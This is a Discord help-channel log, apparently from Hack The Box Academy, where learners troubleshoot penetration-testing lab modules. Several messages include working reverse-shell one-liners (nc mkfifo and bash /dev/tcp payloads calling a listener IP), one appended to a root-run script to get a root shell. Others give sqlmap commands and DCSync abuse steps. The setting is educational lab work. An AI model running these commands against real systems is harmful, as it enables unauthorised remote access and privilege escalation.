#modules

1 messages ¡ Page 396 of 1

shell belfry
#

hi

dark hedge
#

but yea, don't worry about speed. if you can complete it, you're all set

shell belfry
#

im new to this kind of stuff so what do i do if no ports pop up

candid night
#

Speaking of labs - I heard mixed opinions on Dante. Pretty much "It's good practice but a bit out of scope". Do you think I should rather skip it?

worn sonnet
candid night
#

CPTS

worn sonnet
#

I dont think its out of scope

shell belfry
#

yes full port scan

dark hedge
tame shoal
#

Hi, I have some connexion problems with this part of the pivot module : RDP and SOCKS Tunneling with SocksOverRDP.
I can mstsc.exe to connect to the 172.16.5.19, begin the server, then on host 10.129, I started proxifier. And when I try to start mstsc, I can't connect. I also tried setting experience to modem. Any idea ? I use the pwnbox

dark hedge
shell belfry
#

on converge router

#

i just finished cat so i was trying to do my first bounty

#

but none of the methods worked

worn sonnet
dark hedge
#

bounty on converge router?

shell belfry
#

yes

dark hedge
#

like a bug bounty program for Converge ICT?

shell belfry
#

yes

#

very large price

dark hedge
#

where is this bug bounty program hosted

shell belfry
#

found it

#

it says the bounty

dark hedge
#

i'm not clicking on that

candid night
#

Damn

worn sonnet
#

bro no bug bounties are hosted on onion links this is 10000% illegal and we here in HTB dont work with this

#

bug bounty programs only on hackerone , bugcrownd and stuff like this

#

are the ones u should work on

#

dont work in this trash

#

cause its illegal

proud pine
#

Do not post illegal content.

worn sonnet
#

this is not ethitical hacking

#

ur pwned pc will be the first bounty

#

ok bro just dont post here

dark hedge
#

that's a yikes

fresh canyon
#

help please

#

for module network foundations last skill assenssment

tranquil wren
#

Hello, I need a little bit of help. I am on module https://academy.hackthebox.com/module/147/section/1327 Remote password attacks and am running the crackmapexec winrm on the target ip, howver, i have tried a few lists. is there a certain password and user list i should be using? i've looked through the module but don't see anything specific

quartz lagoon
#

here, it should be somewhere at the top of the page

#

you'll find the necessary wordlists to complete this section in the .zip file

tranquil wren
#

oh wow i would have nevr found that

#

thank you so much

quartz lagoon
#

you're very welcome

tranquil wren
#

i've been on this like 3 days lol

#

you're a life saver lol

#

i was like it cannot take this long lol

quartz lagoon
#

yeah am at the end of this module i haven't had too much time to work on it 💀

tranquil wren
#

thank you again

fresh canyon
#

can you help me please i lock 3 days

#

for network foundations modules

#

the last questions skill assenssment

rustic sage
#

I made a rat who wanna risk their pc for me to hack them

sharp wren
#

hey everyone, I'm in the Windows & Attacks and Defense, working on Kerberoasting and I've been stuck for days now trying to connect to the DC for this question: After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user? .... the IP does not seem reachable. is anyone else having issues too? I was not able to SSH into the Kali machine either

worn sonnet
waxen totem
#

Yeah you definitely need ligolo or chisel for that

worn sonnet
sharp wren
fresh canyon
#

Yes

young ore
sharp wren
fresh canyon
young ore
sharp wren
# young ore For this question you need to use remote desktop

I tried it as well : I tried to remote in from the WS001 machine. thought I was about to get it, as I was prompted to enter the password, but then got error message "The connection was denied because the user account is not authorized for remote log-in".

young ore
nimble scroll
#

What's the contents of table flag2? (Case #2)

#

I am stuck on here and don t have any idea how should I proceed , when I run sqlmap -r req.txt doesn t find anything :/

#

SQLMap Essentials module

#

sqlmap -r Case2.txt --threads 10 --dump -T flag2 --batch --level=5 --risk=3 --tamper=space2comment --random-agent

#

I also tried this command and nothing pop up to give me a clue to get the flag :/

supple gorge
#

This Process Injection module is looking mighty fine, I might fork out the big buks to do it.

Hoping it eventually becomes part of a pathway

nimble scroll
#

solved

fresh canyon
nimble scroll
#

??

rancid stream
#

hello

nimble scroll
#

which module

ocean night
fresh canyon
fresh canyon
# ocean night With?

Bypass the request filtering found on the target machine's HTTP service, and submit the flag found in the response. The flag will be in the format: HTB{...}

That please I lock 3 days

#

Today 4 days also

ocean night
#

I can't help, but ask your question directly, that's a tier 0 module so share exactly what you're having trouble with and someone may be able to help

#

Generally I'd initially recommend going back over the module and sections

fathom pendant
ocean night
#

They will cover all you need to answer the question

fathom pendant
#

Though I disagree with connecting to ||ftp|| with nc

#

It's fairly directly laid out how to at least scan throughout the reading

fresh canyon
#

Yes but how ?

fathom pendant
#

Read.

#

The skill assessment basically has a walkthrough in it

fresh canyon
fathom pendant
cerulean hinge
#

For the module Linux Privilege Escalation do we have various path to obtain the flags on the Skill Assesment (at least for the last flag) ?

fresh canyon
#

they don't say how to do it

fathom pendant
fathom pendant
cerulean hinge
fresh canyon
#

Please

fathom pendant
#

It's on the page

fresh canyon
#

it's not written there I read it several times

fathom pendant
#

Yes. It is

fresh canyon
#

Where that please ?

fathom pendant
#

Under Chapter 3. - Target Acquired

#

> Click to show

fresh canyon
#

Where in chapter 3

fathom pendant
#

For fucks sake

#

It's not chapter as in section 3 (components of a network)

#

But read the whole of what's given to you

fresh canyon
#

Oki I read completely so

fathom pendant
#

Then you'd know what to do, while I disagree with using nc to connect to the services it works just the same

ocean night
#

What did jarednexgent have to say @fresh canyon

fathom pendant
#

It goes through getting a file off FTP; reading the file; setting the proper headers

fresh canyon
#

It's okay k do that and I return after thanks

ocean night
#

That's kinda outlined in the section mentioned.. I'd recommend going through and exercising the steps detailed in the module / section, they provide important information pertaining to the questions.

fresh canyon
#

I see , thanks again

earnest moat
#

the ftp is closed on the ftp module, even the one mentioned in the solution, double checked and scanned specifically for that port, i dont think this is intended

polar raven
#

In the Acive Dreictory module, DCsync section :
https://academy.hackthebox.com/module/143/section/1489
It is written :
If we had certain rights over the user (such as WriteDacl), we could also add this privilege to a user under our control, execute the DCSync attack, and then remove the privileges to attempt to cover our tracks. DCSync replication can be performed using tools such as Mimikatz, Invoke-DCSync, and Impacket’s secretsdump.py. Let's see a few quick examples.

I dont' understand, to me it's wrong. It's WriteDacl over the domain and not over a user that could allow to give us replication privilege on a user we control.

earnest pasture
# polar raven In the Acive Dreictory module, DCsync section : https://academy.hackthebox.com/m...

You don't necessarily have to have WriteDACL in the domain. What it means is that by having “WriteDACL” on a user that you have control over, you can give them DCSync privileges “Replicate directory changes” and “Replicate directory changes all” and you will be able to perform DCSync.
ACLs can be applied to other objects, including the domain root object (Domain Object).

polar raven
fathom pendant
#

by having WriteDACL priveleges over an object you can give that user rights that you otherwise might not under normal circumstances

#

nothing about what they said is "implausible"

#

and the bloodhound link you sent doesn't refute what was said

#

in some cases you're chaining together vulnerabilities; you're granting additional rights over X in order to perform Y as X, for instance

#

in this case since you can write the DACL properties you can literally add the DCSync ACE/ACL rights

dark hedge
#

i'm kinda confused myself actually

#

let me do some googling

#

ok so

#

WriteDacl allows you to modify the DACL of the object

#

that means that you can modify any ACEs in the DACL for that object

#

but in order to grant the permissions for DCSync (DC-Replication-Get-Changes and DC-Replication-Get-Changes-All), you have to be able to modify the DACL of the domain object since those permissions can only be granted on the domain object

#

so if we have a user that has permissions to DCSync and we have WriteDacl over this user, then we could:

  1. force change their password to something we know
  2. using their credentials, modify the DACL of the domain object to grant DCSync permissions on a user that we control
  3. perform DCSync with our controlled user
  4. modify the DACL of the domain object again to remove DCSync permissions from our controlled user
safe star
#

So its just WriteDACL over the domain no?

dark hedge
#

yea it's kind of worded weird

#

at least, from my understanding of the attack setup

lusty thicket
#

it's not worded weird

#

just basic escalation logic

dark hedge
#

i guess out of context, it is worded strangely

#

reading the prior paragraphs it'll make sense

#

"obvious thing is obvious" situation

unique ether
#

They added a new feature? Note?

safe star
#

yes

fathom pendant
#

neat feature (someone can feel free to steal this for a /feedback):

  • could be more clear that clicking off closes the note window
  • allow the note window to be pinned open
  • allow the note to be downloaded in some way (beyond Copy/paste)
    I don't see myself using it atm mostly because i already have a flow in place with obsidian, but if you could take notes and download them after, would be useful
orchid scaffold
#

im trying to curl but it returns nothing why so?

#

this is from the web requests module .and to be specific GET module

fathom pendant
#

it tells you exactly how to perform the exercise -> use the browser devtools to figure out what the request is -> copy to curl and adjust to search for 'flag'

orchid scaffold
fathom pendant
#

because you copied the user-agent

#

:P

#

you can also craft the request without copying to curl

oak plank
#

Hi, actually i have problem to get flag for xss warm up lab on advance xss and csrf module
Admins (bot) does not check the page so i can exfiltrate the flag cookie

cloud urchin
#

which section are you on

oak plank
fathom pendant
#

module is above tier 0 please refrain from sharing specifics about it and it looks like the screenshot had a PHPSESSID in it

proper dune
#

If I complete a module, e.g., Tier III Whitebox Attacks, would I be able to restart the module (so I could do it again) even after my subscription is over?

fathom pendant
#

you won't be able to wipe the slate clean, but you can always revisit it after, yes

proper dune
#

Okay nice. Thank you!

opaque geyser
#

In Windows Attacks and Defense module: For the first challenges I did the kerberoasting and got the hash and answered question one but when I open up the other windows remote session with the given IP I can see the ticket request but not one for webservice which would give me the correct service sid or whatever it’s called, Event Id: 4769

orchid scaffold
#

@fathom pendant okay thank you I forgot I was copying user agent 😆

cloud urchin
opaque geyser
cloud urchin
opaque geyser
#

It wouldn’t let me see hint idk why

cloud urchin
fathom pendant
opaque geyser
#

Ok

limber basin
#

Hi I had a quick question; I'm going through the Windows Priv Esc module right now, and I'm on the section for DLL Injection.

in the DLL Hijacking subsection it says Process Explorer but shows Process Monitor; is that a typo or are they related?

tired atlas
#

Actually the problem was time based. It would stop working after about 10 minutes of running. So the higher the thread count, the more passwords it got through. It was really strange, I just got frustrated and just got all the B words from the mut_passwordlist and made a new list.

#

Just wanted the flag at that point

cloud urchin
#

If you feel something is wrong or should be shown a different way you can post in #1234357888114364508

limber basin
gaunt scroll
#

Module Creepy Crawlies: Q: After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.

Tried to instal reconspider but cannot run the tool.

Getting error: 'Seems like you haven't installed Req or Your are not using python3 version, please install using: python3 setup.py install`

#

I have python3 installed

fathom pendant
gaunt scroll
#

@fathom pendant was using the github -- gtk thanks, will try the module steps instead

#

got it -- wow that was crazy straightforward

deep spire
#

I'm really terribly stuck on the File Uploads Attacks' Skills Assessment exercise. Could someone please DM me and help me figure this out. I'm not looking for straight up solutions, just need a nudge in the right direction

fathom pendant
wooden perch
#

I'm using Ligolo, also not being able to get this done

thorn swallow
#

hi, anyone completed the linux privilege escalation module?

fathom pendant
#

nope. you'd be the first

thorn swallow
# fathom pendant https://dontasktoask.com

mb then ill rephrase. Anyone can help me get past environment enumeration part in linux privilege escalation module. I run linPEAS and found nothing helpful, checked the directories and used find / -name "flag*" 2> /dev/null but found nothng helpful?

fathom pendant
#

the hint is in the name of the section

#

<environment> enumeration

thorn swallow
#

oh ill go and check the environment variables and see if i can get anything

#

thanks for the hint!

thorn swallow
polar raven
fathom pendant
#

File Upload Attacks is above tier 0 please don't spoil anything

golden plume
#

Hii guys I am getting error in DNS of footprintng module
I am ||getting recursion requested but not available error||

#

The question is
what is the IPv4 address of the hostname DC1

fathom pendant
#

as i stated in #cpts you may need to look directly at the records instead of asking directly for DC1

#

one of the hostnames may contain DC1

#

the previous question may or may not be related iirc

fathom pendant
#

tunnel vision is a hell of a thing

waxen totem
#

Its part of the output of a query you would've already executed

thorn swallow
golden plume
thorn swallow
fathom pendant
thorn swallow
#

yep i figured it out. shouldnt have look for a file named flag to start with lol

#

thanks for the help!

fathom pendant
#

tunnel vision gets ya good

thorn swallow
#

real good. spent 4 hours staring at this module

jolly raptor
#

Are the VPNs not working right now? Keep getting “Exiting due to fatal error”

jolly raptor
#

ahh appreciate it 🙂

waxen totem
fathom pendant
alpine carbon
#

Hi, am stuck at "dirty pipe" linux PE any hints

#

./exploit-2: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit-2)

#

tried python POC, didnt work

fathom pendant
alpine carbon
#

but why?

severe inlet
#

i'm having a constant problem with RDP'ing into systems
i tried using various tools each of them

either it doesn't connect me at all
or if it does it lasts for a minute and crashes out and the same process repeats

This is on the Credentialed Enumeration of the Active Directory enumeration & Attacks

Any ideas or fixes?

alpine carbon
languid imp
#

Has anyone completed the skills assessment for the CrackMapExec module? I need help.

old wren
#

For context, every time this happened to me, it was usually a networking issue - intermittent VPN connection and such.

languid imp
# old wren ask your question

I'm stuck on the third question.
I gained admin privileges on SQL01, but I haven't been able to make any further progress.
A small hint would really help.

I have compromised the accounts Juliette, Atul, sqldev, and Administrator (SQL01),
but I don't have write permissions on the shares.

rustic sage
#

Try things outside of wordlists. There are many DNS enumeration techniques to get you some more vhosts

golden plume
rustic sage
#

enumerate all subdomains

#

Oh you did that

#

So, did those zone transfers succeed?

golden plume
# rustic sage enumerate all subdomains

Using dnsemum , I could only get some results from ||dev.inlanefreight.htb|| others all just getting NS record query failed
That above subdomain also running for more than 1 hour and still couldn't get desired result

rustic sage
#

what wordlist are you using?

#

Might try the fierce

#

Check resources

#

I reckon you just need to change the wordlist

#

You're on right track

golden plume
golden plume
rustic sage
#

Lovely! Well done.

languid imp
#

anyone finished using crackmapexec module?

fickle crystal
burnt hill
#

Hi, I am really stuck with this question "What is the API key in the hidden admin directory that you have discovered on the target system?" from the skills assesment section of Information gathering - web edition Module "https://academy.hackthebox.com/module/144/section/1311" I can't find the API key, I found the hidden directory, it's the only question of this section I am missing, because I found the email and the key that developers will be chaning too, but this one I can't, any hint?

twin merlin
#

Hey will there be an Exam on the new job path ai red teamer That would look really good on my resume

quartz pine
#

Hello everyone, after numerous attempts, I am still stuck on the question: 'What is the API key in the hidden admin directory that you have discovered on the target system?' in the Information Gathering Skills Assessment. Can anyone please help me out and guide me on how to solve this?

burnt hill
quartz pine
jolly raptor
#

Currently in the DNS section of the footprinting module, The first question “Interact with the target DNS using its IP address and enumerate the FQDN of it”, how do i Interact with the target DNS? I’ve already done a DIG NS

spark niche
#

Hello everyone,
I have an interrogation about the Web Services section of the Login Brute Forcing module.
I don't understand why the output of netstat we do on the ssh session does only show opened services on port 22 and 21. The SSH service we used to connect is at another port (for me it was 30769). Also, if the netstat output shows a listening FTP service on port 21, why does it tell that the FTP service is running locally ?

silk dew
#

Hello I was trying to complete the Public Exploits section in the Getting Started module. I have found an issue, only the pwnbox allowed me to complete. i used metasploit as asked and correctly set RHOSTS, RPORT and FILEPATH, but when I ran exploit i never got the success message. When I did the exact same thing on the pwnbox it worked. Anyone know why or if this is a singular issue or how I can fix/prevent this from happening again?

young ore
proud pine
young ore
jolly raptor
#

it did lol ty

silk dew
#

I wasn't @proud pine

minor cipher
#

guys i am stuck at web service and api attacks skills assessment , any hints please\

silk dew
#

I didn't have the option

#

Because it was one of those web accessible boxes

#

So no openvpn download link

#

@young ore

young ore
#

For the academy it is best to always use the openvpn if you are working from the VM

#

So you don’t stray from the environment

#

@silk dew

silk dew
#

But how do I connect when there's no setting for that in that section?@young ore

young ore
#

You can download one from the previous section

#

And use that for the rest of your academy session

full wagon
#

I'm at the attacking common applications osTicket right now. First, love HTB and the course, so do not misunderstand me. But. Tbh, this is by far the "not so good" module winner so far. It's very unclear what the task is, but reading some posts you are actually supposed to just recap exactly what was shown in the section, logging in as one of the two users with provided passwords. ok, interesting. But if access is constantly denied, then what is the purpose of this section? How am I supposed to tackle this? Sorry, do not mean to have attitude just a little bit frustrated. Thanks in advance!

silk dew
#

exact same configs as in the pwnbox (shut down)

#

there must se something im not doing right, this works perfectly fine in the pwnbox i wasted like 2 hours in the vm when I had the correct solution in the first 3 mins

snow gazelle
#

you are overlooking one option

#

if you still don't have any clue just ping me

young ore
jade lava
#

I'm completely stuck on Server-side Attacks - Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag.

I really need a hint, I don't know how to explain where I'm at without spoilers. Feel free to dm me.

shut wraith
#

Can anyone please help i installed xfreerdp but when i run the command in image it isnt recognized

minor sonnet
#

hello everyone
i am working on Introduction to Windows Evasion Techniques
section : Static Analysis

i have done everything that the question want and i was able to bypass the AV

03/06/2025 09:36:59] C:\Alpha\Static\EvasionApp.exe - OK - Undetected by Microsoft Defender Antivirus
[03/06/2025 09:36:59] C:\Alpha\Static\ex.exe - OK - Undetected by Microsoft Defender Antivirus

but i can't see a flag and i see alot of people talk about this problem , so can anyone help me please , ( i have tried to compile the .cs file with 2 methods )

silk dew
shell merlin
#

why does going to general prompt me to come here

#

Ah i gotta verify my acc

full wagon
fathom tide
#

does footprinting lab hard have privelage escalation?

lunar flicker
#

Hi, anyone can help me in "ADVANCED SQL INJECTIONS - CWEE" Skill assesment QUESTION 1-?

I already got everything but the ||token to reset pass||is not working for any reason, someone can help me please?

fathom tide
#

any hint?

jade lava
#

I'm completely stuck on Server-side Attacks - Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag.

I really need a hint, I don't know how to explain where I'm at without spoilers. Feel free to dm me.

earnest pasture
fathom tide
flint palm
#

Hi Guys who has done weak permissions in WIndows Privilege Escalation?

safe star
fiery imp
#

does anyone know how to fix this problem in Getting started module

#

home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found

minor cipher
#

guys i am stuck at web service and api attacks skills assessment , any hints please

fathom pendant
#

you can inject the code and it'll work just fine

fiery imp
#

and get root access

fathom pendant
#

you first need to add the code to connect back to your machine (on a different port)

#

:)

#

since you know, you do have write access over that file

fiery imp
#

this?

fathom pendant
#

but yes

fiery imp
#

yes

#

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f' | tee -a monitor.sh

fathom pendant
#

so you need to set up another listener on port 8443

fiery imp
fathom pendant
#

then it should connect

#

if it "hangs" when you run the command, that means it's connected

fiery imp
#

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f' | tee -a monitor.sh
tee: monitor.sh: Permission denied
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f

flint palm
#

Guys has anyone done Weak Permissions in Windows Privilege Escalation?

fathom pendant
fiery imp
safe star
quartz shale
#

Hey I wrote RAT for check this in my VM
And I have some problem someone can help me ?

fiery imp
#

└─$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.16.36] from (UNKNOWN) [10.129.205.173] 50878

whoami

root

ls

monitor.sh

safe star
#

Nothing in the root directory?

fiery imp
fathom pendant
#

ls -la and pwd are great for finding where you are

fiery imp
#

i was focusing on [[ error where i should've ignored and checked nc port for reverse shell of root

fathom pendant
#

yep

fiery imp
fiery imp
fathom pendant
#

because of how sh scripts work

#

they will execute line by line even if an error occurs, this is because there's no exit command given in the script

fiery imp
young ore
silk dew
#

I will try, thanks

signal hound
#

Hi im doing tunneling and pivoting module

reverse port forwarding with ssh im
trying to get a reverse shell on the windows machine.
1.I moved the payload to the windows host

  1. I started meterpreter listener on my machine on port 8000
  2. I try to run remote port forwarding using the following command
    ssh -R 172.16.5.129:8080:0.0.0:8000 ubuntu@172.16.6.19
    But i cant connect to it i get "connection timed out"
cobalt rivet
#

Hello how can I get a link for hacking games ?

ocean night
#

You'll need to subscribe / purchase cubes however, as it is not a free module @cobalt rivet

limber fog
#

Hi all,
I'm going crazy, I want to ouput different files such as file1, file2 etc, using something like : cat directory/file*
I need sudo in my case so sudo cat directory/file*
I get the cat: 'directory/file*': Input/output error error
Can someone pls tell me how to fix this ? Thx

#

I tried sudo cat "directory/file*"

#

I'm on PwnBox btw

#

Update : I made it work using the forbidden technique : sudo -s

lusty thicket
#

does that file exist

limber fog
#

Yes 100%

lusty thicket
#

awesome

#

it was a permission issue

#

next time try sudo bash -c "cat directory/file*"

limber fog
#

But is there a correct method ? Because it seems horrible

lusty thicket
#

sudo only elevates the command not how the shell expands file*

limber fog
#

Ok so with this you run the entire command with sudo privileges ?

#

I think i was able to do "sudo cat directory/file1" when naming precisely the file

limber fog
lusty thicket
#

awesome

fresh canyon
#

hey staff i can change my username please

honest spoke
#

https://academy.hackthebox.com/module/113/section/1208 (question 4: Following the steps in this section, obtain code execution on the host and submit the contents of the flag.txt file in the webroot)

-I've tried all the WordPress theme pages to get code execution on 404.php and everyone give: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP

-I've watched videos where this works perfectly, but all my themes in WP won't work?

naive parrot
sand sedge
#

hello guys iam on xss phishing section in xss module they give me as a target and ip wihtout port like this 0.0.0.0(ACADEMY-XSS-ASMT) how i can use this to access the website that i can work on ??

desert quail
fathom pendant
#

@polar raven AD enum and Attacks is above tier 0 refrain from sharing screenshots of the module

ocean night
#

@sand sedge try respawning the target instance.

#

That IP of 0.0.0.0 is not valid.. could be the instance failed to spawn properly

fathom pendant
#

or were you using 0.0.0.0 as a placeholder

ocean night
#

Oh.. good point marcie..

fathom pendant
#

because some sections in the xss module are on the private network; such that you can get a revshell

desert quail
fathom pendant
#

and perform stealing credentials

fathom pendant
ocean night
#

I took what they said too literally 😅

fathom pendant
#

10.129.x.x for targets on the vpn network otherwise it's a public_IP:port

#

if given 10.129.x.x (unless otherwise instructed) you can assume default http:// port

fathom pendant
desert quail
#

my question from above just disapeared whattt

naive parrot
#

but anyway I found another methode by using white wolf webshell

#

thanks tho

fathom pendant
#

for a module above t0 :))))

desert quail
desert quail
fathom pendant
#

i assume you attempted the attack first then patched and tried again? (i haven't done this module)

#

to ensure that the issue isn't some weird networking error

#

in which case:
respawn target
change vpn -> respawn target

desert quail
#

yes, done everything already, with the server listening and changed the value

glacial remnant
cloud urchin
#

most people don't have enterprise accounts, better to simply say the name and section of the module.

glacial remnant
#

sure its Pivoting, Tunneling, and Port Forwarding: SOCKS5 Tunneling with Chisel

cloud urchin
#

ahh yes, you have to use an older version of chisel or static build the newer versions. i believe i used 1.7.4 which worked without issue.

glacial remnant
#

got ya did you just download from git hub or did you mess with trying to change the version after a git clone?

i tired via git clone and i kept running into issues withit not installing the correct version

cloud urchin
#

pretty sure i just downloaded it directly from github

glacial remnant
#

cool thanks ill just try that

naive parrot
#

I made sure to setup the lhost as the ip from the vpn

#

[*] Exploit completed, but no session was created.

#

yet I get that at the end

cloud urchin
#

what port are you using?

naive parrot
#

4444

glacial remnant
# glacial remnant cool thanks ill just try that

looks like running chisel 1.7.4 AND 1.3.1 im getting the same error. think im just going to bed but a little frustrating when ive spent more time troubleshooting versioning then the tunnel itself

wild rapids
cloud urchin
#

maybe this isn't the right exploit

naive parrot
#

found this exploit off a video youtube and the post from medium

#

I've been having issues before trying to get a reverse shell

#

I think it comes from me tbh

#

Ima try the web instance

short hare
#

I am stuck on the format of the answer of
Intro to Whitebox Pentesting : Eval Injection
https://academy.hackthebox.com/module/244/section/2705
Question: Try to reach the 'eval' function by adding a breakpoint within 'generateQR' and modifying the value of 'role'. Then, send a request to the /generate endpoint with 'text' set to: "`;// What is the response you get?

I found the response but it's not accepting

Did anyone went through this ?

naive parrot
cloud urchin
sharp wren
cloud urchin
#

you can ping the target and visit the site right?

coarse ingot
#

Stuck on the file upload skills assessment, I've got the file uploaded and I have the source code. Trying to navigate to the location where the file is stored but I'm getting a 404 error if anyone can help

cloud urchin
coarse ingot
#

Oh my god that was it

ocean night
wild rapids
#

It failed to download so I put this

ocean night
#

I'm not sure I understand, sorry

wild rapids
ocean night
wild rapids
#

I can’t download the page

#

And it won’t take screen

ocean night
#

What page?

#

You're giving me nothing here

wild rapids
#

The academy one to link my account

ocean night
#

What have you tried, and what was the result, please outline each step

#

I don't know if you mean link with an SSO account, or link with Discord (which would be via a Labs account)

wild rapids
#

Link with discord

#

It’s just a white screen for 30 min on my phone

ocean night
#

Follow the instructions in #welcome - you need to obtain your token via the Labs platform

wild rapids
#

Thx

ocean night
#

marcie literaelly told you this the other day

#

What's the problem @wild rapids

wild rapids
#

I can’t load the page to connect my htb acc to my discord one

ocean night
#

What is the URL you are visiting to obtain your token @wild rapids ?

fathom pendant
#

atm the linking on the platforms via the discord button doesn't do anything, you have to go through the manual process outlined in #welcome

cosmic plaza
#

I am working on the module Introduction to Windows Command Line - All About Cmdlets and Modules. I am trying to follow the Import-Module .\PowerSploit.psd1 instruction. But the error seems to come from Windows.

At C:\Users\htb-student\Desktop\Powersploit\PowerSploit-master\PowerSploit.psd1:1 char:1
+ @{
+ ~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ Import-Module .\PowerSploit.psd1

I have already set the execution policy to Bypass.

PS C:\Users\htb-student\Desktop\Powersploit\PowerSploit-master> Get-ExecutionPolicy -List

        Scope ExecutionPolicy
        ----- ---------------
MachinePolicy       Undefined
   UserPolicy       Undefined
      Process          Bypass
  CurrentUser          Bypass
 LocalMachine          Bypass

What can I do with this Windows Defender or Powershell blocking the script?

cloud urchin
#

it says the script was blocked by your antivirus, so i'd assume it's defender blocking it. maybe disable real-time protection or exlcude the folder it's in.

cosmic plaza
#

I have already tried sc stop windefend. Access is denied.

Also cannot xfreerdp in. Only Powershell and cmd is available.

little bolt
#

Any insights ?

cosmic plaza
#

I encountered the same error. Do you manage to resolve the problem? How do you solve it?

cloud urchin
cosmic plaza
cloud urchin
#

i asked chatgpt and it gave me the command but when i googled i saw it there too. chatgpt can be a great tool for finding commands, but just know sometimes it's wrong.

fathom pendant
#

@little bolt be careful with potential spoilers seeing as the API attacks module is tier 2 (see the channel topic)

cosmic plaza
spiral breach
#

I am stuck at the Containerization section of the Linux fundamentals module, can some one tell me how to configure network settings for my lxc container

little bolt
fathom pendant
fathom pendant
#

and it can be taken to dms from there with someone who's willing to help

little bolt
#

Module : API Attacks
Section : Broken Authentication

fathom pendant
#

with a brief description of your issue

little bolt
#

I'm trying to brute-force the OTP for password reset using ffuf, but I'm not getting any valid results. I successfully triggered the OTP request and got a { "SuccessStatus": true } response, so the OTP should be generated. However, ffuf doesn't return the correct OTP, and all responses seem the same.

fiery imp
deep spire
#

Module: File Upload Attacks
Section: Skills Assessment
So I've been stuck here for 2 days now, I got the location of where my uploads are going like I was meant to. All I need to do now is upload my payload and that is getting uploaded as well. But when I try to visit the file, it gives me Error 404 Not Found. I know that I've given the correct file name and path because when I use the same steps to visit an image I uploaded it works. Can someone please help me out here

full wagon
gaunt scroll
#

I tried slowing the scan down as well

#

ok, i backed up one subdomain and tried the robots.txt -- looks like i'm back on track (potentially)

fathom pendant
#

@gaunt scroll spoilers :) anything you had to fuzz/find is a spoiler

gaunt scroll
#

@fathom pendant my apologies

safe star
#

worked just fine for me

digital pendant
#

re: all sorted 🙂

potent blade
#

anyone having issue starting pwnbox?

young ore
digital pendant
young ore
#

The eu doesn’t seem to get affected i guess

young ore
potent blade
#

i did try switching to different locations. doesnt help.. though i already reached out to support for help. thanks guys

unreal totem
#

same issue

uncut panther
ocean night
#

There will be some amount of disruption to services, although it looks like we may be missing the notification on the status page, or have the time wrong

Please stick with us, there is a maintenance period ongoing, and we'll ahve it done as soon as possible. Unsure why the notice was not properly up on the status page. Apologies. Any time missed on your exam, please raise it with support and they will assist you once the maintenance is complete

unreal totem
inland oak
#

Hi, did HTB got issue today? I had a problem with my connection on my vm. The target machine are not spawning.

waxen totem
inland oak
proud pine
digital inlet
#

pong

inland oak
#

haha sorry sorry

#

my bad.. sorry sorry

cosmic plaza
sweet sparrow
#

Hi all, can someone give me a right direction for "PoC and Patching - Null Safety"? Played with some promising functions but got nothing in the end.

lunar flicker
#

Hi, can anyone please give me a hint in ADVANCED SQL INJECTION QUESTION 2? I got the sqli but I noticed that the user doesn’t have superuser permission!!

midnight ridge
#

can anyone tell me what can i do with TGS for SPN like HOST, TERMSRV or RestrictedKerHost?

weary dirge
#

having trouble when pawning getsimple box

#spoilers ahead

  1. I can enumerate the target
  2. can access the admin portal and logged in successfully
  3. whenever i attempt to edit template.php and click save and continue the page tries to reload and after it loads the one liner that i put there is gone
  4. tried different reverse shell one liners
    <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.### 9443 >/tmp/f"); ?>
    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.###/9443 0>&1'"); ?>
  5. i have a nc listener
  6. tried exploiting the target with metasploit but with no avail, throws
[+] 10.129.195.49:80 - The target is vulnerable.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.255:4444 
[*] Exploit completed, but no session was created.```

what am I doing wrong here?
proud pine
daring tundra
#

Alright thank you. I will delete my post

formal igloo
#

Hi, I have a question, does if I active the step-by-step solution the cubes I should earn when complete a questions turns to zero ?

tranquil axle
formal igloo
#

Got it, I think that questions didn't gives cubes

jolly raptor
#

i’m currently in the SMTP section of the footprinting module, and i have the footprinting wordlist to enemurate the user on the smtp server, how would i use this Wordlist to filter out which users are active on the system?

sand sedge
jolly raptor
waxen totem
jolly raptor
#

Think i’ve got it with some google

#

I hope lol

#

i definitely need to use google more, my biggest problem is not knowing what to google

waxen totem
#

Looking back at it now I don't think the nmap script's default wordlist has the proper names and have no clue how to change it kek

jolly raptor
#

I had to scrap nmap and just use script-enum-users

#

done some research on the syntax, got it in the end

waxen totem
#

yeah looking through the args it's not very straightforward for nmap

jolly raptor
#

we got there in the end

waxen totem
#
nmap <SNIP> --script-args brute.creds="<PATH TO WORDLIST>",brute.mode="user"
waxen totem
jolly raptor
#

sure

#

what am i putting on <snip>

waxen totem
nimble scroll
#

hi

#

Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it? here I don t know where to look

#

I tried also source code and could not find the right answear, any sugestions?

waxen totem
#

My suggestion is: be more specific, which module and section?

nimble scroll
#

module

#

Command Injections

#

injecting commands "

waxen totem
#

Nice, so now someone who's actually done that module can get back to you.

tiny rain
#

Can you send me hackthebox link I one to verify

waxen totem
#

